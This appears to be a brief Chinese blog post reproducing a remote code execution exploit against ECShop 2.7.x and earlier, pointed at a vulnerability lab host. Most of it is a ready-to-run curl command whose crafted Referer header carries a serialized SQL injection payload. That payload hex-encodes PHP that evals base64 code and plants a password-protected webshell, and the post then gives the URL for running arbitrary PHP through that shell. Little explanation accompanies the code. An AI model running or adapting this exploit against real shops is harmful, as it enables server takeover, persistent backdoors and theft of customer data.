ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用(复现)

ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用

https://www.vulnspy.com/cn-ecshop-2.7.x-rce-exploit/ecshop_%3C=_2.7.x_%E5%85%A8%E7%B3%BB%E5%88%97%E7%89%88%E6%9C%AC%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E9%AB%98%E5%8D%B1%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/

EXP：

curl http://***.vsplate.me/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"'"'"'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca'

成功获取webshell

执行成功后会自动生成 http://***.vsplate.me/vulnspy.php 文件，密码为 vulnspy。

访问：http://***.vsplate.me/vulnspy.php?vulnspy=phpinfo();

sky666

想用黑客手段对抗黑客

ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用(复现)

ECShop <= 2.7.x 全系列版本远程代码执行高危漏洞利用